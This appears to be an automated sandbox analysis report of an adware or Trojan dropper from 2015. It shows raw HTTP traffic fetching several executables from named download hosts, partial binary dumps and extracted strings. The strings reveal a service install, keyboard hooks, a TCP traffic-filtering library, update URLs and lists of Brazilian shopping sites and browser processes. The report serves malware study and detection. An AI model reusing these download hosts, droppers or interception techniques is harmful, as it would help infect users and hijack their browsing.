Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.14
Location: hXXp://VVV.tjepgz.cc/files/zip_r3/3517_89d09a830004d94b9f646d24de15e7f2/2.zip
0......


GET /files/zip_r3/3517_89d09a830004d94b9f646d24de15e7f2/2.zip HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.tjepgz.cc
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 23 Apr 2015 04:24:07 GMT
Content-Type: application/zip
Content-Length: 2975087
Last-Modified: Tue, 14 Apr 2015 08:23:03 GMT
Connection: keep-alive
ETag: "552cce67-2d656f"
Accept-Ranges: bytes
PK...........F................479.db.../.u.>p..m....<..A#.<y.
...\..-2...a7."....}.zx....(....N.J8...t.J.-Q..C$....G.!;Q`..%...D.>
;uZ....s.L........* ...i.5A.`.....j._\.....e.M. ..}.....\.3.[......m..
...Z......5oV.Q7..c.x......U...5...........6OsxTJniPK..........bF]=...
...........wpm_v20.0.0.1953_0302.exe..S.nM....m....m..m..m..l..m.:.\..
.E....s{.*F.5j.......z.......T.C.t.f.,f..y.^.a.....P.3.O^:.~L....(....
...Z..,...R...xN......*g...2.._.i.y..A[7..K%...W... Jn.ET.d3.8.A.Rpi&g
t;..E..}.......Eb.L/..../.Q.../..q...........[.VZ..4_..J.4.(...{..SQ..
..f....*.....1.}BO..........gD..?..|od...W..].6..a.E....*Rz...&...G...
..5.dW ..nD7&..4C2......zb.Be..[....T(b...rj..4X....g........u>Y..~
..D!...5.Z...w.....w.[...N......M.........i....l..3..."..W7.D.t.......
..Cv.r.-........N..1..B...<.......zI.......G.F#Al...;..L..[.j.g.w._
...~z.../......s...h]..R........K...1....v}~..].....Rd]?a....#.".]r..-
..x....Z...z|`.......x..)..4/...........N..aQG...lq.4`..`....d>....
.wGyf.q.RzN.....9,.t.Rr..=......M.%....l[>..Bt.<...D..G..S4.$s.g
..... ...Y.N.h`..Y...3.5.m."..Pfc%j..$.....R...J..i..x...?J.T.)L..@%..
....F9..L.#..`}7....q.%....sj.]. ...r.../z..Ff.<x-b.d..P..pE..l`k.?
:n..Aq.....<..F.....^..r...7.b\....}.,$.p)<..Q.....U.>.D.....
@}4u.....N....#..A 4g2.uU.r}"......#X....d.{.)..........R..m.DR.d.2...
....o#....30O......(g(H.Aro...0.P....tt5.7@W4;....BR.J1^Lf....H'..q...
HMA..of.]w#..?..I..~>FL2.T.v:.&\..${.KB......o.Z.R.&.<....Zf)...
".D<...@_.....WE....*.[\.b..W._?.S{.x..,....pP...qC\. ....zC...
<<< skipped >>>


GET /v4/sof-ient/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action0=xa.geoip&action2=visit&update0=ref,pcm&update1=nation,us&update2=language,en&update3=version,2.8.8.2102&update4=chptid,pcm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:58 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.53 ms","message":"store 3 action and 5 upd
ate "}..0......


GET /v4/sof-ient/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action1=install.pcm HTTP/1.1


User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:58 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.54 ms","message":"store 1 action and 0 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 23 Apr 201
5 07:24:58 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encod
ing: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-
version: v4..48..{"stats":"ok","time":"0.54 ms","message":"store 1 act
ion and 0 update "}..0..



GET /310714d/240714_ps.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:27 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 523264
Content-Description: File Transfer
Content-Disposition: attachment; filename="240714_ps.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................Z....... ...0.......p....@.........
................. ...............................................s....
......................................................................
.............p...............................text....X.......Z........
.......... ..`.rdata.......p.......^..............@[email protected].......
.....p..............@....ndata.......p...........................rsrc.
...............t..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h [email protected]...\r@._^3.
[.....L$...nD...Si.. ..VW.T.....tO.q.3.;5.nD.sB..i.. ...D.......t.G...
..t...O..t .....u...3....3...F.. ..;5.nD.r._^[...U..QQ.U.SV..i.. .
<<< skipped >>>

GET /310714d/310714_a9.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:29 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 503904
Content-Description: File Transfer
Content-Disposition: attachment; filename="310714_a9.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...........;...;...
;...]r_.|....<V.<....Z\......Z^.p....Z_.....2...(...;.......]rB.
6...]rX.:...;...:...]r].:...Rich;...................PE..L...X,.U......
...........<...T......3o.......P....@..............................
[email protected].........................
.`........;..`[email protected].......
........................text....:.......<.................. ..`.rda
ta...(...P...*...@..............@[email protected]............
[email protected]...............................@[email protected]..................
[email protected]......................................................
......................................................................
......................................................................
......................................................................
......................................................................
..U..V...y-...E..t.V..6.......^]...................O-.............U..j
.h.;E.d.....P.... .F.3..E.VWP.E.d........}.j..u...&...E......F......F.
..F......F..3..F.....f.F..F.f.F .F$.F(.F,.F0.E....u(.E.P.M..E...F..P,.
.h.YF..E.P.E. bE..%e..WV..#........M.d......Y_^.M.3..4 ....]....V..V..
$...F,.....t.P..3......F,.....F$..t.P..3......F$.....F...t.P..3......F
......F...t.P..3......F......F...t.P..3......F......F...t.P..3......F.
......^..%....U..V.u..... .... bE...^]........U...E..V....daE.t.V.
<<< skipped >>>

GET /310714d/310714_am2.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N HTTP/1.1


User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:33 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 311296
Content-Description: File Transfer
Content-Disposition: attachment; filename="310714_am2.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........x....u...u.
..u..a....u..o....u.3W....u.......u.....7.u.......u..a....u...t.*.u...
....u.......u.......u.Rich..u.........................PE..L......T....
......................................@...............................
........@..................................|..........(...............
.........)[email protected].....
.......................text............................... ..`.rdata..
............................@[email protected]....:...........v..............@.
...rsrc...(...........................@[email protected]...).......*..........
[email protected]..........................................................
......................................................................
......................................................................
......................................................................
............................................j...4.....................
..........t.j.j.j.P....D...P....D.....................3.9.............
....t.j.j.j.P....D...P....D....>....................t.j.j.j.P....D.
..P....D.....3..H..H.........3....D....D..|.D..x.D....D..x.D..........
........=\.D..u.3...=`.D...L.D.s..L.D..U..j.h..C.d.....PSVW.D.D.3.P.E.
d......E..}....LD......3.3..O.._.f.W..][email protected]..^.f....
.Q..U....I.f.....f;.u. M...Q.*....GtHJD.................._x...........
................................._l._p.......Gh....._`._d.........
<<< skipped >>>


GET /services/stores?dummy=526 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.related.deals
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:14 GMT
Content-Type: text/html
Connection: close
P3P: CP="Potato"
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Origin: *
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: EU
related.deals.aliexpress.com.viagens.americanas.com.br.americanas.com.
br.azulviagens.com.br.casasbahia.com.br.catho.com.br.centauro.com.br.c
itylar.com.br.colcci.com.br.colombo.com.br.cvc.com.br.dafiti.com.br.de
colar.com.extra.com.br.fastshop.com.br.fnac.com.br.forum.com.br.girafa
.com.br.voegol.com.br.insinuante.com.br.kanui.com.br.lenovo.com.br.loj
askd.com.br.magazineluiza.com.br.marisa.com.br.megamamute.com.br.mobly
.com.br.netshoes.com.br.polishop.com.br.pontofrio.com.br.posthaus.com.
br.ricardoeletro.com.br.rihappy.com.br.samsclub.com.br.saraiva.com.br.
sepha.com.br.sephora.com.br.shopfato.com.br.shoptime.com.br.submarino.
com.br.submarinoviagens.com.br.tam.com.br.walmart.com.br...







The Trojan connects to the servers at the folowing location(s):







%original file name%.exe_1396:




.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
ShowWebInPopUp
\LOCALS~1\Temp\nst3.tmp\nsWeb.dll
B3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_gs.exe
ndex.php /ta /ci 9664 /i MyBestOffersTodayBR
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp\nsWeb.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp
n%D,3
GetProcessHeap
OLEAUT32.dll
CreateURLMoniker
urlmon.dll
WININET.dll
nsWeb.dll
ShowWebInPage
MSHTML.DLL
1 1$1(1,1014181<1@1
t%SSj
GetWindowsDirectoryW
RegEnumKeyExW
RegEnumKeyExA
RegCreateKeyExW
RegOpenKeyExW
RegDeleteKeyW
registry.dll
_CopyKey
_CreateKey
_DeleteKey
_DeleteKeyEmpty
_KeyExists
_MoveKey
_RestoreKey
_SaveKey
.reloc
System.dll
callback%d
@.reloc
d2.kX
W.uje
nst3.tmp
\LOCALS~1\Temp\nst3.tmp
3886080
c:\%original file name%.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nso1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
-2063532032
-2147284440
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="highestAvailable" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
%s /s "%s"
regedit.exe
REG_KEY
%s%s%s
x,
=hex(%x):
=dword:x
="%s"
[%s\%s]
[-%s\%s]
Windows Registry Editor Version 5.00
7.8.5.9

%original file name%.exe_1396_rwx_01134000_00001000:




callback%d

q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe_1316:




.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
ShowWebInPopUp
\LOCALS~1\Temp\nsq6.tmp\nsWeb.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq6.tmp\nsWeb.dll
%Program Files%
\nsWeb.dll
hXXp://goo.gl/Bw14Po
$$\wininit.ini
@.reloc
n%D,3
GetProcessHeap
OLEAUT32.dll
CreateURLMoniker
urlmon.dll
WININET.dll
nsWeb.dll
ShowWebInPage
MSHTML.DLL
1 1$1(1,1014181<1@1
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq6.tmp
nsq6.tmp
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq6.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Temp\O15O8WbPqkjNWDUfU8L4Mr8GpVb15O8WbPqkjNWDUfU8L4Mr8GpVb
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N
q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl4.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
8.9.3.9

310714_is.exe_1880:




.idata
.rdata
P.reloc
P.rsrc
SYh%f
kernel32.dll
.DEFAULT\Control Panel\International
File I/O error %d
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: %s
LzmaDecode failed (%d)
shell32.dll
/SL5="$%x,%d,%d,
Inno Setup Setup Data (5.5.0)
Inno Setup Messages (5.5.0)
user32.dll
oleaut32.dll
advapi32.dll
RegOpenKeyExA
RegCloseKey
GetWindowsDirectoryA
MsgWaitForMultipleObjects
ExitWindowsEx
comctl32.dll
name="JR.Inno.Setup"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
External exception %x
Web Setup
5.3.2.4
2.0.7

310714_is.tmp_1388:




.text
`.rdata
@.data
.rsrc
@.reloc
c:\Projects\Basic\Release\Basic.pdb
KERNEL32.dll
USER32.dll
_amsg_exit
_wcmdln
_crt_debugger_hook
MSVCR90.dll
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.VC90.CRT" version="9.0.21022.8" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>

CashReminder.exe_1232:




.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
TURLAction
HelpKeywordp
TURLDownloadStatus
dsBeginSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
TDownLoadURL
URLMON.DLL
URLDownloadToFileA
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeywordT
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecutepWE
content-security-policy-report-only
127.0.0.1
255.0.0.0
ServiceExecute
\P_StoreList.txt
\P_CheckUpdate.txt
\cr_update.exe
hXXp://VVV.related.deals/services/rules?dummy=
hXXp://VVV.related.deals/services/stores?dummy=
hXXp://VVV.related.deals/services/update/
\P_RuleList.txt
[N] ProductKey :
cmd.exe /c net start CashReminder
cmd.exe /c net stop CashReminder
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
ReportEventA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
wsock32.dll
nfapi.dll
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpSetConnectionState
psapi.dll
ProtocolFilters.dll
5l6O6W6
< <$<(<,<0<4<8<<<
?!?%?)?-?1?5?9?=?
5%6x6
1 1$1(1,1014181
0&0.080=0
2%3)3-31383
; ;$;(;,;0;4;8;
1#1'1 1/13171;1
=!=,=7=?=_=
5 5$5(5,505
3 3$3(3,3
3 3$3(3,3034383<3@3
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
UrlMon
OnExecute
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Alt  Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation

WNet.exe_2284:




.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
TURLAction
HelpKeywordp
TURLDownloadStatus
dsBeginSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
TDownLoadURL
URLMON.DLL
URLDownloadToFileA
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeywordT
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecutepWE
127.0.0.1
255.0.0.0
ServiceExecute
\P_CheckUpdate.txt
NOVA UPDATE DISPONIVEL! URL:
\po_update.exe
hXXp://VVV.brsoftwarellc.com/services/rules.txt?dummy=
hXXp://VVV.brsoftwarellc.com/services/update.php?v=
&key=
\P_RuleList.txt
[E] ProductKey :
[N] ProductKey :
cmd.exe /c net start WNet
cmd.exe /c net stop WNet
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
ReportEventA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
wsock32.dll
nfapi.dll
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpSetConnectionState
psapi.dll
ProtocolFilters.dll
5l6O6W6
< <$<(<,<0<4<8<<<
?!?%?)?-?1?5?9?=?
5%6x6
1 1$1(1,1014181
0&0.080=0
2%3)3-31383
; ;$;(;,;0;4;8;
1#1'1 1/13171;1
=!=,=7=?=_=
5 5$5(5,505
3 3$3(3,3
3 3$3(3,3034383<3@3
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
I<.oS8"
KWindows
UrlMon
OnExecute
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Alt  Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation

ActSys.exe_2648:




.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
UhWEB
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
TURLAction
HelpKeyword<
TURLDownloadStatus
dsBeginSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
TDownLoadURL
URLMON.DLL
URLDownloadToFileA
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreviewx4D
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecute<XE
iexplore.exe
firefox.exe
chrome.exe
safari.exe
opera.exe
netscape.exe
torch.exe
seamonkey.exe
k-meleon.exe
konqueror.exe
maxthon.exe
flock.exe
lunascape.exe
amaya.exe
midori.exe
kidzui.exe
rockmelt.exe
sbrowser.exe
slimbrowser.exe
kidrocket.exe
epic.exe
ironbrowser.exe
comodo.exe
comododragon.exe
crazybrowser.exe
arora.exe
shenzbrowser.exe
enigmabrowser.exe
avant.exe
avantbrowser.exe
orca.exe
xbbrowser.exe
xbrowser.exe
sleipnir.exe
spacetime.exe
3dbrowse.exe
bitty.exe
java.exe
grail.exe
lynx.exe
twb.exe
tt.exe
pinkbrowser.exe
nuke.exe
acoo.exe
palemoon.exe
slimboat.exe
dooble.exe
menubox.exe
chromium.exe
ultrabrowser.exe
